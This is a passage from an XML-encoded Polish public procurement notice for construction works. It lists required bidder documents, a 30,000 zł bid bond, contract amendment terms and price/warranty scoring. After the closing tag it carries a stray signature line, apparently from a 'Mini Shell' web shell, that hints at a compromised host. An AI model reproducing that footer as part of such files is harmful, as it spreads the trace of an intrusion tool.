lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp, tj: 1) informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 Pzp oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez Zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 2) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 3) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 4) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Pzp; 5) oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności; 6) oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne; 7) oświadczenia Wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 Pzp; 8) oświadczenia Wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 Pzp; 9) oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716); Wykonawcy, którzy polegają na zdolności technicznej lub zawodowej, sytuacji finansowej lub ekonomicznej innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, przedstawiają w odniesieniu do tych podmiotów nw. dokumenty: 1) informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 2) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 3) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 4) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy; 5) oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo – w przypadku wydania takiego wyroku lub decyzji – dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności; 6) oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne; 7) oświadczenia Wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy; 8) oświadczenia Wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy; 9) oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716) </wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>1)dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego. 2) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty; 3) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami </zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>1.zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia lub inny dokument potwierdzający ten fakt – (jeżeli Wykonawca polega na zasobach innych podmiotów), W celu oceny, czy Wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda dokumentów które określają w szczególności: 1) zakres dostępnych Wykonawcy zasobów innego podmiotu; 2) sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia publicznego; 3) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego. 4) czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. 2.kosztorysy ofertowe uproszczone 3.Pełnomocnictwo (jeśli dotyczy) 4.Oświadczenie Wykonawcy dotyczące obowiązku podatkowego</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium>Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 30.000 zł (słownie: trzydzieści tysięcy złotych 00/100). Wadium musi posiadać okres ważności nie krótszy niż okres związania ofertą, pod rygorem odrzucenia oferty .</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w przypadku o którym mowa w art. 144 ustawy Pzp oraz w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. Zmiana przepisów o podatku od towarów i usług/zmniejszenie/zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT.Zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia/Zmiana umowy w zakresie wynikającym z nowo obowiązujących przepisów. Zmiana terminu wykonania zadania z przyczyn niezależnych od Wykonawcy i Zamawiającego, na skutek sytuacji, których nie można było wcześniej przewidzieć/Spisanie aneksu do umowy przesuwającego termin wykonania zadania o taki czas, ile trwało wstrzymanie wykonywanie usługi z przyczyn niezależnych od Wykonawcy i Zamawiającego, na skutek sytuacji których nie można było wcześniej przewidzieć. Zmiana lub rezygnacja podmiotu na zdolnościach lub sytuacji którego polegał Wykonawca w celu spełnienia warunków udziału w postępowaniu na zasadach określonych art.22a ust.1 ustawy pzp/Wprowadzenie innego podmiotu (Podwykonawca lub Wykonawca), który spełnia warunki w stopniu nie mniejszym niż podwykonawca, na którego zasoby powoływał się w trakcie postępowania o udzielenie zamówienia
</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>KOSZT WYKONANIA</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>28/02/2017</data_skl><godz_skl>09:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki></IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>60</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6>Sprecyzowanie kryteriów oceny ofert:
w kryterium 1 w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższy wskaźnik - cena – zostanie zastosowany następujący wzór arytmetyczny:
(n : b) x 60 
Oferta z najniższą ceną otrzyma 60 punktów, pozostałe proporcjonalnie mniej, gdzie:
a) n - wartość oferty z najmniejszą wartością, 
b) b - wartość oferty badanej, 
c) 60 - wskaźnik stały,

w kryterium 2 „okres gwarancji na roboty budowlane” ocena punktowa przedstawia się następująco:
1)	za udzielenie gwarancji wynoszącej od 24 do 35  miesięcy	- 0 punktów
2)	za udzielenie gwarancji wynoszącej 36 miesięcy	             	- 40 punktów 

W niniejszym kryterium Wykonawca może uzyskać maksymalnie 40 pkt. 
Zgodnie z SIWZ zaoferowany okres gwarancji nie może być krótszy niż 24 miesiące
(w przypadku zaoferowania okresu gwarancji krótszego niż 24 miesiące oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp, w przypadku zaoferowania okresu gwarancji dłuższego niż 36 miesięcy Zamawiający przyzna 40 punktów). 

1)	Zamawiający przyzna zamówienie Wykonawcy, którego oferta odpowiada zasadom 
określonym w ustawie Pzp i w Specyfikacji Istotnych Warunków Zamówienia oraz została  uznana za najkorzystniejszą, tzn. uzyskała największą ilość punktów w oparciu o podane  kryteria wyboru oferty.
</IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie /><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci></nr_czesci><nazwa></nazwa><opis></opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c></cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1></kryt_1><kryt_1p></kryt_1p></cz_0></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com